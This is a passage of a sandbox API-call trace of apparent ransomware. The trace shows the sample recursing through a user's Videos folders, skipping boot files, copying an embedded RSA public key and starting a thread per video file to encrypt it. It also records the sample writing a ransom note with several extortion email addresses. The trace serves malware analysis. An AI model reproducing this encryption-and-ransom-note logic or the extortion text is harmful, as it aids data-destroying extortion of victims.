07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0131.950] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0131.950] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.950] lstrcpyW (in: lpString1=0x17addc, lpString2="i2GwNYb4B.mp4" | out: lpString1="i2GwNYb4B.mp4") returned="i2GwNYb4B.mp4" [0131.950] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0131.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ac [0131.951] Sleep (dwMilliseconds=0x96) [0132.106] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0132.106] lstrcmpW (lpString1="NxtD.flv", lpString2="..") returned 1 [0132.106] lstrcmpW (lpString1="NxtD.flv", lpString2=".") returned 1 [0132.106] StrStrW (lpFirst="NxtD.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0132.106] StrStrW (lpFirst="NxtD.flv", lpSrch="ntldr") returned 0x0 [0132.106] StrStrW (lpFirst="NxtD.flv", lpSrch="NTLDR") returned 0x0 [0132.106] StrStrW (lpFirst="NxtD.flv", lpSrch="NTDETECT.COM") returned 0x0 [0132.106] StrStrW (lpFirst="NxtD.flv", lpSrch="ntdetect.com") returned 0x0 [0132.106] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0132.106] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0132.106] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0132.106] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.107] lstrcpyW (in: lpString1=0x17addc, lpString2="NxtD.flv" | out: lpString1="NxtD.flv") returned="NxtD.flv" [0132.107] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0132.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6b8 [0132.107] Sleep (dwMilliseconds=0x96) [0132.262] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0132.262] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 1 [0132.262] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 0 [0132.262] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0132.262] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*" [0132.262] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0132.262] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0132.262] SetErrorMode (uMode=0x1) returned 0x1 [0132.263] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT") returned 84 [0132.263] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0132.263] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0132.263] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x6bc) returned 0x0 [0132.263] RegQueryValueExW (in: hKey=0x6bc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ceaa90, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3ceaa90*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0132.263] RegCloseKey (hKey=0x6bc) returned 0x0 [0132.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0132.263] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0132.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6bc [0132.263] WriteFile (in: hFile=0x6bc, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0132.264] CloseHandle (hObject=0x6bc) returned 1 [0132.264] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cde658 [0132.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="O903hcW" [0132.264] lstrcpyW (in: lpString1=0x17a5a4, lpString2="O903hcW" | out: lpString1="O903hcW") returned="O903hcW" [0132.264] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0132.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0132.264] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0132.265] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0132.265] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0132.265] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0132.265] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0132.265] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0132.265] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0132.265] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 1 [0132.265] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 0 [0132.265] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.265] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0132.265] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 1 [0132.265] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 0 [0132.265] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0132.265] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0132.265] lstrcmpW (lpString1="xAriJR5aTdl", lpString2="..") returned 1 [0132.265] lstrcmpW (lpString1="xAriJR5aTdl", lpString2=".") returned 1 [0132.265] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0132.265] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0132.265] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0132.265] SetErrorMode (uMode=0x1) returned 0x1 [0132.265] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0132.265] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.265] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.265] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*" [0132.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cde5d8 [0132.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="xAriJR5aTdl" [0132.267] lstrcpyW (in: lpString1=0x17b644, lpString2="xAriJR5aTdl" | out: lpString1="xAriJR5aTdl") returned="xAriJR5aTdl" [0132.267] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.267] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.267] lstrcmpW (lpString1="6OPfc4qVaMTq.flv", lpString2="..") returned 1 [0132.267] lstrcmpW (lpString1="6OPfc4qVaMTq.flv", lpString2=".") returned 1 [0132.267] StrStrW (lpFirst="6OPfc4qVaMTq.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0132.267] StrStrW (lpFirst="6OPfc4qVaMTq.flv", lpSrch="ntldr") returned 0x0 [0132.267] StrStrW (lpFirst="6OPfc4qVaMTq.flv", lpSrch="NTLDR") returned 0x0 [0132.267] StrStrW (lpFirst="6OPfc4qVaMTq.flv", lpSrch="NTDETECT.COM") returned 0x0 [0132.267] StrStrW (lpFirst="6OPfc4qVaMTq.flv", lpSrch="ntdetect.com") returned 0x0 [0132.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0132.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0132.267] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0132.267] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.267] lstrcpyW (in: lpString1=0x17be7c, lpString2="6OPfc4qVaMTq.flv" | out: lpString1="6OPfc4qVaMTq.flv") returned="6OPfc4qVaMTq.flv" [0132.267] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6b0 [0132.268] Sleep (dwMilliseconds=0x96) [0132.418] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.418] lstrcmpW (lpString1="MyRwYX_9-WNJ1OXdc1N.mp4", lpString2="..") returned 1 [0132.418] lstrcmpW (lpString1="MyRwYX_9-WNJ1OXdc1N.mp4", lpString2=".") returned 1 [0132.418] StrStrW (lpFirst="MyRwYX_9-WNJ1OXdc1N.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0132.418] StrStrW (lpFirst="MyRwYX_9-WNJ1OXdc1N.mp4", lpSrch="ntldr") returned 0x0 [0132.418] StrStrW (lpFirst="MyRwYX_9-WNJ1OXdc1N.mp4", lpSrch="NTLDR") returned 0x0 [0132.418] StrStrW (lpFirst="MyRwYX_9-WNJ1OXdc1N.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0132.418] StrStrW (lpFirst="MyRwYX_9-WNJ1OXdc1N.mp4", lpSrch="ntdetect.com") returned 0x0 [0132.418] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0132.418] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0132.418] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0132.418] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.418] lstrcpyW (in: lpString1=0x17be7c, lpString2="MyRwYX_9-WNJ1OXdc1N.mp4" | out: lpString1="MyRwYX_9-WNJ1OXdc1N.mp4") returned="MyRwYX_9-WNJ1OXdc1N.mp4" [0132.418] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6b4 [0132.419] Sleep (dwMilliseconds=0x96) [0132.574] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.574] lstrcmpW (lpString1="yXpEf4.mkv", lpString2="..") returned 1 [0132.574] lstrcmpW (lpString1="yXpEf4.mkv", lpString2=".") returned 1 [0132.574] StrStrW (lpFirst="yXpEf4.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0132.574] StrStrW (lpFirst="yXpEf4.mkv", lpSrch="ntldr") returned 0x0 [0132.574] StrStrW (lpFirst="yXpEf4.mkv", lpSrch="NTLDR") returned 0x0 [0132.574] StrStrW (lpFirst="yXpEf4.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0132.574] StrStrW (lpFirst="yXpEf4.mkv", lpSrch="ntdetect.com") returned 0x0 [0132.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0132.574] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0132.574] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0132.574] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.574] lstrcpyW (in: lpString1=0x17be7c, lpString2="yXpEf4.mkv" | out: lpString1="yXpEf4.mkv") returned="yXpEf4.mkv" [0132.574] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.574] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0132.575] Sleep (dwMilliseconds=0x96) [0132.730] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0132.730] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 1 [0132.730] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 0 [0132.731] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS 